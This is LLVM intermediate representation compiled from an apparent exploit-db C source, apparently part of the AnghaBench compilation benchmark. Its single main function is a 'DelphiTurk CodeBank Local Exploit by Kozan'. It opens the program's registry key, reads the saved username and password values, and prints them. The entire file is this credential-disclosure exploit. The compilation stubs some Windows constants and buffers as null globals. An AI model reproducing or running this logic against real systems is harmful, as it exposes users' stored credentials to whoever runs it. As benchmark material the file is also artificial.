; ModuleID = '/home/carl/AnghaBench/exploitdb/exploits/windows/local/extr_798.c_main.c'
source_filename = "/home/carl/AnghaBench/exploitdb/exploits/windows/local/extr_798.c_main.c"
target datalayout = "e-m:e-p270:32:32-p271:32:32-p272:64:64-i64:64-f80:128-n8:16:32:64-S128"
target triple = "x86_64-unknown-linux-gnu"

@HKEY_CURRENT_USER = common dso_local global i32 0, align 4
@.str = private unnamed_addr constant [29 x i8] c"Software\\DelphiTurk\\Codebank\00", align 1
@KEY_QUERY_VALUE = common dso_local global i32 0, align 4
@hKey = common dso_local global i32 0, align 4
@ERROR_SUCCESS = common dso_local global i64 0, align 8
@.str.1 = private unnamed_addr constant [9 x i8] c"username\00", align 1
@username = common dso_local global i8* null, align 8
@dwBufLen = common dso_local global i64 0, align 8
@lRet = common dso_local global i64 0, align 8
@BUFSIZE = common dso_local global i64 0, align 8
@.str.2 = private unnamed_addr constant [18 x i8] c"En error occured!\00", align 1
@.str.3 = private unnamed_addr constant [9 x i8] c"password\00", align 1
@password = common dso_local global i8* null, align 8
@.str.4 = private unnamed_addr constant [45 x i8] c"DelphiTurk CodeBank Local Exploit by Kozan\0A\0A\00", align 1
@.str.5 = private unnamed_addr constant [14 x i8] c"Username: %s\0A\00", align 1
@.str.6 = private unnamed_addr constant [14 x i8] c"Password: %s\0A\00", align 1
@.str.7 = private unnamed_addr constant [53 x i8] c"DelphiTurk Codebank is not installed on your system!\00", align 1

; Function Attrs: noinline nounwind optnone uwtable
define dso_local i32 @main() #0 {
  %1 = alloca i32, align 4
  store i32 0, i32* %1, align 4
  %2 = load i32, i32* @HKEY_CURRENT_USER, align 4
  %3 = load i32, i32* @KEY_QUERY_VALUE, align 4
  %4 = call i64 @RegOpenKeyEx(i32 %2, i8* getelementptr inbounds ([29 x i8], [29 x i8]* @.str, i64 0, i64 0), i32 0, i32 %3, i32* @hKey)
  %5 = load i64, i64* @ERROR_SUCCESS, align 8
  %6 = icmp eq i64 %4, %5
  br i1 %6, label %7, label %47

7:                                                ; preds = %0
  %8 = load i32, i32* @hKey, align 4
  %9 = load i8*, i8** @username, align 8
  %10 = ptrtoint i8* %9 to i32
  %11 = call i64 @RegQueryValueEx(i32 %8, i8* getelementptr inbounds ([9 x i8], [9 x i8]* @.str.1, i64 0, i64 0), i32* null, i32* null, i32 %10, i64* @dwBufLen)
  store i64 %11, i64* @lRet, align 8
  %12 = load i64, i64* @lRet, align 8
  %13 = load i64, i64* @ERROR_SUCCESS, align 8
  %14 = icmp ne i64 %12, %13
  br i1 %14, label %19, label %15

15:                                               ; preds = %7
  %16 = load i64, i64* @dwBufLen, align 8
  %17 = load i64, i64* @BUFSIZE, align 8
  %18 = icmp sgt i64 %16, %17
  br i1 %18, label %19, label %23

19:                                               ; preds = %15, %7
  %20 = load i32, i32* @hKey, align 4
  %21 = call i32 @RegCloseKey(i32 %20)
  %22 = call i32 (i8*, ...) @printf(i8* getelementptr inbounds ([18 x i8], [18 x i8]* @.str.2, i64 0, i64 0))
  store i32 0, i32* %1, align 4
  br label %50

23:                                               ; preds = %15
  %24 = load i32, i32* @hKey, align 4
  %25 = load i8*, i8** @password, align 8
  %26 = ptrtoint i8* %25 to i32
  %27 = call i64 @RegQueryValueEx(i32 %24, i8* getelementptr inbounds ([9 x i8], [9 x i8]* @.str.3, i64 0, i64 0), i32* null, i32* null, i32 %26, i64* @dwBufLen)
  store i64 %27, i64* @lRet, align 8
  %28 = load i64, i64* @lRet, align 8
  %29 = load i64, i64* @ERROR_SUCCESS, align 8
  %30 = icmp ne i64 %28, %29
  br i1 %30, label %35, label %31

31:                                               ; preds = %23
  %32 = load i64, i64* @dwBufLen, align 8
  %33 = load i64, i64* @BUFSIZE, align 8
  %34 = icmp sgt i64 %32, %33
  br i1 %34, label %35, label %39

35:                                               ; preds = %31, %23
  %36 = load i32, i32* @hKey, align 4
  %37 = call i32 @RegCloseKey(i32 %36)
  %38 = call i32 (i8*, ...) @printf(i8* getelementptr inbounds ([18 x i8], [18 x i8]* @.str.2, i64 0, i64 0))
  store i32 0, i32* %1, align 4
  br label %50

39:                                               ; preds = %31
  %40 = load i32, i32* @hKey, align 4
  %41 = call i32 @RegCloseKey(i32 %40)
  %42 = call i32 (i8*, ...) @printf(i8* getelementptr inbounds ([45 x i8], [45 x i8]* @.str.4, i64 0, i64 0))
  %43 = load i8*, i8** @username, align 8
  %44 = call i32 (i8*, ...) @printf(i8* getelementptr inbounds ([14 x i8], [14 x i8]* @.str.5, i64 0, i64 0), i8* %43)
  %45 = load i8*, i8** @password, align 8
  %46 = call i32 (i8*, ...) @printf(i8* getelementptr inbounds ([14 x i8], [14 x i8]* @.str.6, i64 0, i64 0), i8* %45)
  br label %49

47:                                               ; preds = %0
  %48 = call i32 (i8*, ...) @printf(i8* getelementptr inbounds ([53 x i8], [53 x i8]* @.str.7, i64 0, i64 0))
  br label %49

49:                                               ; preds = %47, %39
  store i32 0, i32* %1, align 4
  br label %50

50:                                               ; preds = %49, %35, %19
  %51 = load i32, i32* %1, align 4
  ret i32 %51
}

declare dso_local i64 @RegOpenKeyEx(i32, i8*, i32, i32, i32*) #1

declare dso_local i64 @RegQueryValueEx(i32, i8*, i32*, i32*, i32, i64*) #1

declare dso_local i32 @RegCloseKey(i32) #1

declare dso_local i32 @printf(i8*, ...) #1


!llvm.module.flags = !{!0}
!llvm.ident = !{!1}

!0 = !{i32 1, !"wchar_size", i32 4}
!1 = !{!"clang version 10.0.1 (https://github.com/wsmoses/llvm-project-tok c8e5003577614e72d6d18a216e6a09771e1fcce4)"}
